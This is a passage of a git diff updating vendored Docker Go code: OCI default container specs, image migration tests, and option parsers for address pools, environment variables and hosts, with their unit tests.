 	if err != nil {
 		return err
 	}
@@ -480,7 +477,7 @@ func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metad
 
 	checksum, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, "checksum"))
 	if err == nil { // best effort
-		dgst, err := digest.ParseDigest(string(checksum))
+		dgst, err := digest.Parse(string(checksum))
 		if err == nil {
 			V2MetadataService := metadata.NewV2MetadataService(ms)
 			V2MetadataService.Add(layer.DiffID(), metadata.V2Metadata{Digest: dgst})
diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go
index be82fdc75e..09cdac82da 100644
--- a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go
+++ b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go
@@ -1,4 +1,4 @@
-package v1
+package v1 // import "github.com/docker/docker/migrate/v1"
 
 import (
 	"crypto/rand"
@@ -13,11 +13,11 @@ import (
 	"runtime"
 	"testing"
 
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/distribution/metadata"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
-	"github.com/docker/docker/reference"
+	"github.com/opencontainers/go-digest"
 )
 
 func TestMigrateRefs(t *testing.T) {
@@ -40,9 +40,9 @@ func TestMigrateRefs(t *testing.T) {
 	}
 
 	expected := map[string]string{
-		"busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9",
-		"busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9",
-		"registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae",
+		"docker.io/library/busybox:latest":                                                                  "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9",
+		"docker.io/library/busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9",
+		"docker.io/library/registry:2":                                                                      "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae",
 	}
 
 	if !reflect.DeepEqual(expected, ta.refs) {
@@ -87,14 +87,15 @@ func TestMigrateContainers(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	ls := &mockMounter{}
-
 	ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb"))
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	is, err := image.NewImageStore(ifs, ls)
+	ls := &mockMounter{}
+	mmMap := make(map[string]image.LayerGetReleaser)
+	mmMap[runtime.GOOS] = ls
+	is, err := image.NewImageStore(ifs, mmMap)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -165,14 +166,15 @@ func TestMigrateImages(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	ls := &mockRegistrar{}
-
 	ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb"))
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	is, err := image.NewImageStore(ifs, ls)
+	ls := &mockRegistrar{}
+	mrMap := make(map[string]image.LayerGetReleaser)
+	mrMap[runtime.GOOS] = ls
+	is, err := image.NewImageStore(ifs, mrMap)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -323,10 +325,7 @@ func addContainer(dest, jsonConfig string) error {
 	if err := os.MkdirAll(contDir, 0700); err != nil {
 		return err
 	}
-	if err := ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600); err != nil {
-		return err
-	}
-	return nil
+	return ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600)
 }
 
 type mockTagAdder struct {
diff --git a/vendor/github.com/docker/docker/oci/defaults_linux.go b/vendor/github.com/docker/docker/oci/defaults.go
similarity index 58%
rename from vendor/github.com/docker/docker/oci/defaults_linux.go
rename to vendor/github.com/docker/docker/oci/defaults.go
index 8b3ce7281b..4145412dd4 100644
--- a/vendor/github.com/docker/docker/oci/defaults_linux.go
+++ b/vendor/github.com/docker/docker/oci/defaults.go
@@ -1,4 +1,4 @@
-package oci
+package oci // import "github.com/docker/docker/oci"
 
 import (
 	"os"
@@ -7,19 +7,65 @@ import (
 	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
-func sPtr(s string) *string      { return &s }
 func iPtr(i int64) *int64        { return &i }
 func u32Ptr(i int64) *uint32     { u := uint32(i); return &u }
 func fmPtr(i int64) *os.FileMode { fm := os.FileMode(i); return &fm }
 
-// DefaultSpec returns default oci spec used by docker.
+func defaultCapabilities() []string {
+	return []string{
+		"CAP_CHOWN",
+		"CAP_DAC_OVERRIDE",
+		"CAP_FSETID",
+		"CAP_FOWNER",
+		"CAP_MKNOD",
+		"CAP_NET_RAW",
+		"CAP_SETGID",
+		"CAP_SETUID",
+		"CAP_SETFCAP",
+		"CAP_SETPCAP",
+		"CAP_NET_BIND_SERVICE",
+		"CAP_SYS_CHROOT",
+		"CAP_KILL",
+		"CAP_AUDIT_WRITE",
+	}
+}
+
+// DefaultSpec returns the default spec used by docker for the current Platform
 func DefaultSpec() specs.Spec {
+	return DefaultOSSpec(runtime.GOOS)
+}
+
+// DefaultOSSpec returns the spec for a given OS
+func DefaultOSSpec(osName string) specs.Spec {
+	if osName == "windows" {
+		return DefaultWindowsSpec()
+	}
+	return DefaultLinuxSpec()
+}
+
+// DefaultWindowsSpec create a default spec for running Windows containers
+func DefaultWindowsSpec() specs.Spec {
+	return specs.Spec{
+		Version: specs.Version,
+		Windows: &specs.Windows{},
+		Process: &specs.Process{},
+		Root:    &specs.Root{},
+	}
+}
+
+// DefaultLinuxSpec create a default spec for running Linux containers
+func DefaultLinuxSpec() specs.Spec {
 	s := specs.Spec{
 		Version: specs.Version,
-		Platform: specs.Platform{
-			OS:   runtime.GOOS,
-			Arch: runtime.GOARCH,
+		Process: &specs.Process{
+			Capabilities: &specs.LinuxCapabilities{
+				Bounding:    defaultCapabilities(),
+				Permitted:   defaultCapabilities(),
+				Inheritable: defaultCapabilities(),
+				Effective:   defaultCapabilities(),
+			},
 		},
+		Root: &specs.Root{},
 	}
 	s.Mounts = []specs.Mount{
 		{
@@ -32,7 +78,7 @@ func DefaultSpec() specs.Spec {
 			Destination: "/dev",
 			Type:        "tmpfs",
 			Source:      "tmpfs",
-			Options:     []string{"nosuid", "strictatime", "mode=755"},
+			Options:     []string{"nosuid", "strictatime", "mode=755", "size=65536k"},
 		},
 		{
 			Destination: "/dev/pts",
@@ -58,31 +104,23 @@ func DefaultSpec() specs.Spec {
 			Source:      "mqueue",
 			Options:     []string{"nosuid", "noexec", "nodev"},
 		},
-	}
-	s.Process.Capabilities = []string{
-		"CAP_CHOWN",
-		"CAP_DAC_OVERRIDE",
-		"CAP_FSETID",
-		"CAP_FOWNER",
-		"CAP_MKNOD",
-		"CAP_NET_RAW",
-		"CAP_SETGID",
-		"CAP_SETUID",
-		"CAP_SETFCAP",
-		"CAP_SETPCAP",
-		"CAP_NET_BIND_SERVICE",
-		"CAP_SYS_CHROOT",
-		"CAP_KILL",
-		"CAP_AUDIT_WRITE",
+		{
+			Destination: "/dev/shm",
+			Type:        "tmpfs",
+			Source:      "shm",
+			Options:     []string{"nosuid", "noexec", "nodev", "mode=1777"},
+		},
 	}
 
 	s.Linux = &specs.Linux{
 		MaskedPaths: []string{
 			"/proc/kcore",
+			"/proc/keys",
 			"/proc/latency_stats",
 			"/proc/timer_list",
 			"/proc/timer_stats",
 			"/proc/sched_debug",
+			"/proc/scsi",
 			"/sys/firmware",
 		},
 		ReadonlyPaths: []string{
@@ -93,7 +131,7 @@ func DefaultSpec() specs.Spec {
 			"/proc/sys",
 			"/proc/sysrq-trigger",
 		},
-		Namespaces: []specs.Namespace{
+		Namespaces: []specs.LinuxNamespace{
 			{Type: "mount"},
 			{Type: "network"},
 			{Type: "uts"},
@@ -102,67 +140,72 @@ func DefaultSpec() specs.Spec {
 		},
 		// Devices implicitly contains the following devices:
 		// null, zero, full, random, urandom, tty, console, and ptmx.
-		// ptmx is a bind-mount or symlink of the container's ptmx.
+		// ptmx is a bind mount or symlink of the container's ptmx.
 		// See also: https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#default-devices
-		Devices: []specs.Device{},
-		Resources: &specs.Resources{
-			Devices: []specs.DeviceCgroup{
+		Devices: []specs.LinuxDevice{},
+		Resources: &specs.LinuxResources{
+			Devices: []specs.LinuxDeviceCgroup{
 				{
 					Allow:  false,
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 				{
 					Allow:  true,
-					Type:   sPtr("c"),
+					Type:   "c",
 					Major:  iPtr(1),
 					Minor:  iPtr(5),
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 				{
 					Allow:  true,
-					Type:   sPtr("c"),
+					Type:   "c",
 					Major:  iPtr(1),
 					Minor:  iPtr(3),
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 				{
 					Allow:  true,
-					Type:   sPtr("c"),
+					Type:   "c",
 					Major:  iPtr(1),
 					Minor:  iPtr(9),
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 				{
 					Allow:  true,
-					Type:   sPtr("c"),
+					Type:   "c",
 					Major:  iPtr(1),
 					Minor:  iPtr(8),
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 				{
 					Allow:  true,
-					Type:   sPtr("c"),
+					Type:   "c",
 					Major:  iPtr(5),
 					Minor:  iPtr(0),
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 				{
 					Allow:  true,
-					Type:   sPtr("c"),
+					Type:   "c",
 					Major:  iPtr(5),
 					Minor:  iPtr(1),
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 				{
 					Allow:  false,
-					Type:   sPtr("c"),
+					Type:   "c",
 					Major:  iPtr(10),
 					Minor:  iPtr(229),
-					Access: sPtr("rwm"),
+					Access: "rwm",
 				},
 			},
 		},
 	}
 
+	// For LCOW support, populate a blank Windows spec
+	if runtime.GOOS == "windows" {
+		s.Windows = &specs.Windows{}
+	}
+
 	return s
 }
diff --git a/vendor/github.com/docker/docker/oci/defaults_solaris.go b/vendor/github.com/docker/docker/oci/defaults_solaris.go
deleted file mode 100644
index 85c8b68e16..0000000000
--- a/vendor/github.com/docker/docker/oci/defaults_solaris.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package oci
-
-import (
-	"runtime"
-
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-// DefaultSpec returns default oci spec used by docker.
-func DefaultSpec() specs.Spec {
-	s := specs.Spec{
-		Version: "0.6.0",
-		Platform: specs.Platform{
-			OS:   "SunOS",
-			Arch: runtime.GOARCH,
-		},
-	}
-	s.Solaris = &specs.Solaris{}
-	return s
-}
diff --git a/vendor/github.com/docker/docker/oci/defaults_windows.go b/vendor/github.com/docker/docker/oci/defaults_windows.go
deleted file mode 100644
index ab51904ec4..0000000000
--- a/vendor/github.com/docker/docker/oci/defaults_windows.go
+++ /dev/null
@@ -1,19 +0,0 @@
-package oci
-
-import (
-	"runtime"
-
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-// DefaultSpec returns default spec used by docker.
-func DefaultSpec() specs.Spec {
-	return specs.Spec{
-		Version: specs.Version,
-		Platform: specs.Platform{
-			OS:   runtime.GOOS,
-			Arch: runtime.GOARCH,
-		},
-		Windows: &specs.Windows{},
-	}
-}
diff --git a/vendor/github.com/docker/docker/oci/devices_linux.go b/vendor/github.com/docker/docker/oci/devices_linux.go
index 2840d2586a..46d4e1d32d 100644
--- a/vendor/github.com/docker/docker/oci/devices_linux.go
+++ b/vendor/github.com/docker/docker/oci/devices_linux.go
@@ -1,4 +1,4 @@
-package oci
+package oci // import "github.com/docker/docker/oci"
 
 import (
 	"fmt"
@@ -8,12 +8,12 @@ import (
 
 	"github.com/opencontainers/runc/libcontainer/configs"
 	"github.com/opencontainers/runc/libcontainer/devices"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
-// Device transforms a libcontainer configs.Device to a specs.Device object.
-func Device(d *configs.Device) specs.Device {
-	return specs.Device{
+// Device transforms a libcontainer configs.Device to a specs.LinuxDevice object.
+func Device(d *configs.Device) specs.LinuxDevice {
+	return specs.LinuxDevice{
 		Type:     string(d.Type),
 		Path:     d.Path,
 		Major:    d.Major,
@@ -24,19 +24,19 @@ func Device(d *configs.Device) specs.Device {
 	}
 }
 
-func deviceCgroup(d *configs.Device) specs.DeviceCgroup {
+func deviceCgroup(d *configs.Device) specs.LinuxDeviceCgroup {
 	t := string(d.Type)
-	return specs.DeviceCgroup{
+	return specs.LinuxDeviceCgroup{
 		Allow:  true,
-		Type:   &t,
+		Type:   t,
 		Major:  &d.Major,
 		Minor:  &d.Minor,
-		Access: &d.Permissions,
+		Access: d.Permissions,
 	}
 }
 
 // DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions.
-func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) {
+func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.LinuxDevice, devPermissions []specs.LinuxDeviceCgroup, err error) {
 	resolvedPathOnHost := pathOnHost
 
 	// check if it is a symbolic link
diff --git a/vendor/github.com/docker/docker/oci/devices_unsupported.go b/vendor/github.com/docker/docker/oci/devices_unsupported.go
index 6252cab536..af6dd3bda2 100644
--- a/vendor/github.com/docker/docker/oci/devices_unsupported.go
+++ b/vendor/github.com/docker/docker/oci/devices_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package oci
+package oci // import "github.com/docker/docker/oci"
 
 import (
 	"errors"
@@ -11,10 +11,10 @@ import (
 
 // Device transforms a libcontainer configs.Device to a specs.Device object.
 // Not implemented
-func Device(d *configs.Device) specs.Device { return specs.Device{} }
+func Device(d *configs.Device) specs.LinuxDevice { return specs.LinuxDevice{} }
 
 // DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions.
 // Not implemented
-func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) {
+func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.LinuxDevice, devPermissions []specs.LinuxDeviceCgroup, err error) {
 	return nil, nil, errors.New("oci/devices: unsupported platform")
 }
diff --git a/vendor/github.com/docker/docker/oci/namespaces.go b/vendor/github.com/docker/docker/oci/namespaces.go
index 4902482498..5a2d8f2087 100644
--- a/vendor/github.com/docker/docker/oci/namespaces.go
+++ b/vendor/github.com/docker/docker/oci/namespaces.go
@@ -1,16 +1,13 @@
-package oci
+package oci // import "github.com/docker/docker/oci"
 
-import specs "github.com/opencontainers/runtime-spec/specs-go"
+import "github.com/opencontainers/runtime-spec/specs-go"
 
 // RemoveNamespace removes the `nsType` namespace from OCI spec `s`
-func RemoveNamespace(s *specs.Spec, nsType specs.NamespaceType) {
-	idx := -1
+func RemoveNamespace(s *specs.Spec, nsType specs.LinuxNamespaceType) {
 	for i, n := range s.Linux.Namespaces {
 		if n.Type == nsType {
-			idx = i
+			s.Linux.Namespaces = append(s.Linux.Namespaces[:i], s.Linux.Namespaces[i+1:]...)
+			return
 		}
 	}
-	if idx >= 0 {
-		s.Linux.Namespaces = append(s.Linux.Namespaces[:idx], s.Linux.Namespaces[idx+1:]...)
-	}
 }
diff --git a/vendor/github.com/docker/docker/opts/address_pools.go b/vendor/github.com/docker/docker/opts/address_pools.go
new file mode 100644
index 0000000000..9b27a62853
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/address_pools.go
@@ -0,0 +1,84 @@
+package opts
+
+import (
+	"encoding/csv"
+	"encoding/json"
+	"fmt"
+	"strconv"
+	"strings"
+
+	types "github.com/docker/libnetwork/ipamutils"
+)
+
+// PoolsOpt is a Value type for parsing the default address pools definitions
+type PoolsOpt struct {
+	values []*types.NetworkToSplit
+}
+
+// UnmarshalJSON fills values structure  info from JSON input
+func (p *PoolsOpt) UnmarshalJSON(raw []byte) error {
+	return json.Unmarshal(raw, &(p.values))
+}
+
+// Set predefined pools
+func (p *PoolsOpt) Set(value string) error {
+	csvReader := csv.NewReader(strings.NewReader(value))
+	fields, err := csvReader.Read()
+	if err != nil {
+		return err
+	}
+
+	poolsDef := types.NetworkToSplit{}
+
+	for _, field := range fields {
+		parts := strings.SplitN(field, "=", 2)
+		if len(parts) != 2 {
+			return fmt.Errorf("invalid field '%s' must be a key=value pair", field)
+		}
+
+		key := strings.ToLower(parts[0])
+		value := strings.ToLower(parts[1])
+
+		switch key {
+		case "base":
+			poolsDef.Base = value
+		case "size":
+			size, err := strconv.Atoi(value)
+			if err != nil {
+				return fmt.Errorf("invalid size value: %q (must be integer): %v", value, err)
+			}
+			poolsDef.Size = size
+		default:
+			return fmt.Errorf("unexpected key '%s' in '%s'", key, field)
+		}
+	}
+
+	p.values = append(p.values, &poolsDef)
+
+	return nil
+}
+
+// Type returns the type of this option
+func (p *PoolsOpt) Type() string {
+	return "pool-options"
+}
+
+// String returns a string repr of this option
+func (p *PoolsOpt) String() string {
+	var pools []string
+	for _, pool := range p.values {
+		repr := fmt.Sprintf("%s %d", pool.Base, pool.Size)
+		pools = append(pools, repr)
+	}
+	return strings.Join(pools, ", ")
+}
+
+// Value returns the mounts
+func (p *PoolsOpt) Value() []*types.NetworkToSplit {
+	return p.values
+}
+
+// Name returns the flag name of this option
+func (p *PoolsOpt) Name() string {
+	return "default-address-pools"
+}
diff --git a/vendor/github.com/docker/docker/opts/address_pools_test.go b/vendor/github.com/docker/docker/opts/address_pools_test.go
new file mode 100644
index 0000000000..7f9c709968
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/address_pools_test.go
@@ -0,0 +1,20 @@
+package opts // import "github.com/docker/docker/opts"
+
+import (
+	"testing"
+)
+
+func TestAddressPoolOpt(t *testing.T) {
+	poolopt := &PoolsOpt{}
+	var addresspool = "base=175.30.0.0/16,size=16"
+	var invalidAddresspoolString = "base=175.30.0.0/16,size=16, base=175.33.0.0/16,size=24"
+
+	if err := poolopt.Set(addresspool); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := poolopt.Set(invalidAddresspoolString); err == nil {
+		t.Fatal(err)
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/opts/env.go b/vendor/github.com/docker/docker/opts/env.go
new file mode 100644
index 0000000000..f6e5e9074d
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/env.go
@@ -0,0 +1,48 @@
+package opts // import "github.com/docker/docker/opts"
+
+import (
+	"fmt"
+	"os"
+	"runtime"
+	"strings"
+
+	"github.com/pkg/errors"
+)
+
+// ValidateEnv validates an environment variable and returns it.
+// If no value is specified, it returns the current value using os.Getenv.
+//
+// As on ParseEnvFile and related to #16585, environment variable names
+// are not validate what so ever, it's up to application inside docker
+// to validate them or not.
+//
+// The only validation here is to check if name is empty, per #25099
+func ValidateEnv(val string) (string, error) {
+	arr := strings.Split(val, "=")
+	if arr[0] == "" {
+		return "", errors.Errorf("invalid environment variable: %s", val)
+	}
+	if len(arr) > 1 {
+		return val, nil
+	}
+	if !doesEnvExist(val) {
+		return val, nil
+	}
+	return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil
+}
+
+func doesEnvExist(name string) bool {
+	for _, entry := range os.Environ() {
+		parts := strings.SplitN(entry, "=", 2)
+		if runtime.GOOS == "windows" {
+			// Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent.
+			if strings.EqualFold(parts[0], name) {
+				return true
+			}
+		}
+		if parts[0] == name {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/opts/env_test.go b/vendor/github.com/docker/docker/opts/env_test.go
new file mode 100644
index 0000000000..1ecf1e2b94
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/env_test.go
@@ -0,0 +1,124 @@
+package opts // import "github.com/docker/docker/opts"
+
+import (
+	"fmt"
+	"os"
+	"runtime"
+	"testing"
+)
+
+func TestValidateEnv(t *testing.T) {
+	testcase := []struct {
+		value    string
+		expected string
+		err      error
+	}{
+		{
+			value:    "a",
+			expected: "a",
+		},
+		{
+			value:    "something",
+			expected: "something",
+		},
+		{
+			value:    "_=a",
+			expected: "_=a",
+		},
+		{
+			value:    "env1=value1",
+			expected: "env1=value1",
+		},
+		{
+			value:    "_env1=value1",
+			expected: "_env1=value1",
+		},
+		{
+			value:    "env2=value2=value3",
+			expected: "env2=value2=value3",
+		},
+		{
+			value:    "env3=abc!qwe",
+			expected: "env3=abc!qwe",
+		},
+		{
+			value:    "env_4=value 4",
+			expected: "env_4=value 4",
+		},
+		{
+			value:    "PATH",
+			expected: fmt.Sprintf("PATH=%v", os.Getenv("PATH")),
+		},
+		{
+			value: "=a",
+			err:   fmt.Errorf(fmt.Sprintf("invalid environment variable: %s", "=a")),
+		},
+		{
+			value:    "PATH=something",
+			expected: "PATH=something",
+		},
+		{
+			value:    "asd!qwe",
+			expected: "asd!qwe",
+		},
+		{
+			value:    "1asd",
+			expected: "1asd",
+		},
+		{
+			value:    "123",
+			expected: "123",
+		},
+		{
+			value:    "some space",
+			expected: "some space",
+		},
+		{
+			value:    "  some space before",
+			expected: "  some space before",
+		},
+		{
+			value:    "some space after  ",
+			expected: "some space after  ",
+		},
+		{
+			value: "=",
+			err:   fmt.Errorf(fmt.Sprintf("invalid environment variable: %s", "=")),
+		},
+	}
+
+	// Environment variables are case in-sensitive on Windows
+	if runtime.GOOS == "windows" {
+		tmp := struct {
+			value    string
+			expected string
+			err      error
+		}{
+			value:    "PaTh",
+			expected: fmt.Sprintf("PaTh=%v", os.Getenv("PATH")),
+		}
+		testcase = append(testcase, tmp)
+
+	}
+
+	for _, r := range testcase {
+		actual, err := ValidateEnv(r.value)
+
+		if err != nil {
+			if r.err == nil {
+				t.Fatalf("Expected err is nil, got err[%v]", err)
+			}
+			if err.Error() != r.err.Error() {
+				t.Fatalf("Expected err[%v], got err[%v]", r.err, err)
+			}
+		}
+
+		if err == nil && r.err != nil {
+			t.Fatalf("Expected err[%v], but err is nil", r.err)
+		}
+
+		if actual != r.expected {
+			t.Fatalf("Expected [%v], got [%v]", r.expected, actual)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/hosts.go b/vendor/github.com/docker/docker/opts/hosts.go
index 266df1e537..2adf4211d5 100644
--- a/vendor/github.com/docker/docker/opts/hosts.go
+++ b/vendor/github.com/docker/docker/opts/hosts.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"fmt"
@@ -9,7 +9,7 @@ import (
 )
 
 var (
-	// DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. docker daemon -H tcp://
+	// DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. dockerd -H tcp://
 	// These are the IANA registered port numbers for use with Docker
 	// see http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=docker
 	DefaultHTTPPort = 2375 // Default HTTP Port
@@ -29,15 +29,15 @@ var (
 // ValidateHost validates that the specified string is a valid host and returns it.
 func ValidateHost(val string) (string, error) {
 	host := strings.TrimSpace(val)
-	// The empty string means default and is not handled by parseDockerDaemonHost
+	// The empty string means default and is not handled by parseDaemonHost
 	if host != "" {
-		_, err := parseDockerDaemonHost(host)
+		_, err := parseDaemonHost(host)
 		if err != nil {
 			return val, err
 		}
 	}
 	// Note: unlike most flag validators, we don't return the mutated value here
-	//       we need to know what the user entered later (using ParseHost) to adjust for tls
+	//       we need to know what the user entered later (using ParseHost) to adjust for TLS
 	return val, nil
 }
 
@@ -52,7 +52,7 @@ func ParseHost(defaultToTLS bool, val string) (string, error) {
 		}
 	} else {
 		var err error
-		host, err = parseDockerDaemonHost(host)
+		host, err = parseDaemonHost(host)
 		if err != nil {
 			return val, err
 		}
@@ -60,9 +60,9 @@ func ParseHost(defaultToTLS bool, val string) (string, error) {
 	return host, nil
 }
 
-// parseDockerDaemonHost parses the specified address and returns an address that will be used as the host.
+// parseDaemonHost parses the specified address and returns an address that will be used as the host.
 // Depending of the address specified, this may return one of the global Default* strings defined in hosts.go.
-func parseDockerDaemonHost(addr string) (string, error) {
+func parseDaemonHost(addr string) (string, error) {
 	addrParts := strings.SplitN(addr, "://", 2)
 	if len(addrParts) == 1 && addrParts[0] != "" {
 		addrParts = []string{"tcp", addrParts[0]}
@@ -149,3 +149,17 @@ func ParseTCPAddr(tryAddr string, defaultAddr string) (string, error) {
 
 	return fmt.Sprintf("tcp://%s%s", net.JoinHostPort(host, port), u.Path), nil
 }
+
+// ValidateExtraHost validates that the specified string is a valid extrahost and returns it.
+// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6).
+func ValidateExtraHost(val string) (string, error) {
+	// allow for IPv6 addresses in extra hosts by only splitting on first ":"
+	arr := strings.SplitN(val, ":", 2)
+	if len(arr) != 2 || len(arr[0]) == 0 {
+		return "", fmt.Errorf("bad format for add-host: %q", val)
+	}
+	if _, err := ValidateIPAddress(arr[1]); err != nil {
+		return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1])
+	}
+	return val, nil
+}
diff --git a/vendor/github.com/docker/docker/opts/hosts_test.go b/vendor/github.com/docker/docker/opts/hosts_test.go
index a5bec30d4c..cd8c3f91f2 100644
--- a/vendor/github.com/docker/docker/opts/hosts_test.go
+++ b/vendor/github.com/docker/docker/opts/hosts_test.go
@@ -1,7 +1,8 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"fmt"
+	"strings"
 	"testing"
 )
 
@@ -82,12 +83,12 @@ func TestParseDockerDaemonHost(t *testing.T) {
 		"localhost:5555/path":     "tcp://localhost:5555/path",
 	}
 	for invalidAddr, expectedError := range invalids {
-		if addr, err := parseDockerDaemonHost(invalidAddr); err == nil || err.Error() != expectedError {
+		if addr, err := parseDaemonHost(invalidAddr); err == nil || err.Error() != expectedError {
 			t.Errorf("tcp %v address expected error %q return, got %q and addr %v", invalidAddr, expectedError, err, addr)
 		}
 	}
 	for validAddr, expectedAddr := range valids {
-		if addr, err := parseDockerDaemonHost(validAddr); err != nil || addr != expectedAddr {
+		if addr, err := parseDaemonHost(validAddr); err != nil || addr != expectedAddr {
 			t.Errorf("%v -> expected %v, got (%v) addr (%v)", validAddr, expectedAddr, err, addr)
 		}
 	}
@@ -146,3 +147,35 @@ func TestParseInvalidUnixAddrInvalid(t *testing.T) {
 		t.Fatalf("Expected an %v, got %v", v, "unix:///var/run/docker.sock")
 	}
 }
+
+func TestValidateExtraHosts(t *testing.T) {
+	valid := []string{
+		`myhost:192.168.0.1`,
+		`thathost:10.0.2.1`,
+		`anipv6host:2003:ab34:e::1`,
+		`ipv6local:::1`,
+	}
+
+	invalid := map[string]string{
+		`myhost:192.notanipaddress.1`:  `invalid IP`,
+		`thathost-nosemicolon10.0.0.1`: `bad format`,
+		`anipv6host:::::1`:             `invalid IP`,
+		`ipv6local:::0::`:              `invalid IP`,
+	}
+
+	for _, extrahost := range valid {
+		if _, err := ValidateExtraHost(extrahost); err != nil {
+			t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err)
+		}
+	}
+
+	for extraHost, expectedError := range invalid {
+		if _, err := ValidateExtraHost(extraHost); err == nil {
+			t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost)
+		} else {
+			if !strings.Contains(err.Error(), expectedError) {
+				t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/hosts_unix.go b/vendor/github.com/docker/docker/opts/hosts_unix.go
index 611407a9d9..9d5bb64565 100644
--- a/vendor/github.com/docker/docker/opts/hosts_unix.go
+++ b/vendor/github.com/docker/docker/opts/hosts_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import "fmt"
 
diff --git a/vendor/github.com/docker/docker/opts/hosts_windows.go b/vendor/github.com/docker/docker/opts/hosts_windows.go
index 7c239e00f1..906eba53ee 100644
--- a/vendor/github.com/docker/docker/opts/hosts_windows.go
+++ b/vendor/github.com/docker/docker/opts/hosts_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 // DefaultHost constant defines the default host string used by docker on Windows
 var DefaultHost = "npipe://" + DefaultNamedPipe
diff --git a/vendor/github.com/docker/docker/opts/ip.go b/vendor/github.com/docker/docker/opts/ip.go
index fb03b50111..cfbff3a9fd 100644
--- a/vendor/github.com/docker/docker/opts/ip.go
+++ b/vendor/github.com/docker/docker/opts/ip.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"fmt"
@@ -22,7 +22,7 @@ func NewIPOpt(ref *net.IP, defaultVal string) *IPOpt {
 }
 
 // Set sets an IPv4 or IPv6 address from a given string. If the given
-// string is not parseable as an IP address it returns an error.
+// string is not parsable as an IP address it returns an error.
 func (o *IPOpt) Set(val string) error {
 	ip := net.ParseIP(val)
 	if ip == nil {
diff --git a/vendor/github.com/docker/docker/opts/ip_test.go b/vendor/github.com/docker/docker/opts/ip_test.go
index 1027d84a05..966d7f21ec 100644
--- a/vendor/github.com/docker/docker/opts/ip_test.go
+++ b/vendor/github.com/docker/docker/opts/ip_test.go
